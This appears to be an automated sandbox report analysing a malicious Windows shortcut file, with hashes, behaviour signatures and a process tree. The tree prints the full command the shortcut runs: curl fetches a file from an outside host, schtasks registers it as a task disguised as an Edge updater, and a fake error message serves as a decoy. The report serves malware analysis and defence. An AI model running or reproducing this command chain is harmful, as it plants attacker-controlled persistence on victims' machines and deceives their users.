Resubmissions

06-03-2024 15:01

240306-sdvz9sbf8t 7

06-03-2024 14:59

240306-sc3cysah54 3

06-03-2024 14:41

240306-r2taxagc37 7

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    06-03-2024 14:41

General

  • Target

    414d6ed63baaaa69a555068e91e1ee89dbcf38cac7ac4918f6e50fb82d039485.lnk

  • Size

    2KB

  • MD5

    10f4479d5f531def842a712277ae9611

  • SHA1

    bdb075abba517e216a41933cec5b30b4d50c0e76

  • SHA256

    414d6ed63baaaa69a555068e91e1ee89dbcf38cac7ac4918f6e50fb82d039485

  • SHA512

    5306675e38c391bb39a9b4a7bbcbeaf807e2e10bd8e1d5e560e49c77802946b39f033f653954db998d130edb08fc1add8b4dd199c4ab019c4e33fd25fcb57382

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious use of WriteProcessMemory 10 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\414d6ed63baaaa69a555068e91e1ee89dbcf38cac7ac4918f6e50fb82d039485.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:944
    • C:\WINDOWS\system32\conhost.exe
      "C:\WINDOWS\system32\conhost.exe" --headless cmd /c curl -o C:\Users\Public\Documents\config.xml demolaservices.com/mml.php & schtasks /create /tn MicrosoftEdgeUpdateEngine /xml C:\Users\Public\Documents\config.xml & msg * "Incompatible Windows version. Try another Windows PC."
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2332
      • C:\WINDOWS\system32\cmd.exe
        cmd /c curl -o C:\Users\Public\Documents\config.xml demolaservices.com/mml.php & schtasks /create /tn MicrosoftEdgeUpdateEngine /xml C:\Users\Public\Documents\config.xml & msg * "Incompatible Windows version. Try another Windows PC."
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4324
        • C:\Windows\system32\curl.exe
          curl -o C:\Users\Public\Documents\config.xml demolaservices.com/mml.php
          4⤵
          PID:3600
        • C:\Windows\system32\schtasks.exe
          schtasks /create /tn MicrosoftEdgeUpdateEngine /xml C:\Users\Public\Documents\config.xml
          4⤵
          • Creates scheduled task(s)
          PID:3276
        • C:\Windows\system32\msg.exe
          msg * "Incompatible Windows version. Try another Windows PC."
          4⤵
          PID:1772
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
    PID:2604

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Public\Documents\config.xml

    Filesize

    2KB

    MD5

    1937af09268af0f1ee47eabb62a28f2c

    SHA1

    551433d0819679f3f37e370e2b51e35336194c80

    SHA256

    1ba020416e58b45e42a854dace76cca56bebbdeebfd0abdfb4a33c12a22390d4

    SHA512

    093b9f5a4ff6fe00b7bd2ed113e220f19cc0a96ac2eaf4993ca62a05706a955353a7a7cbaa86f7630883fd680cfb95107249be42da69c94259742d6284f7b94c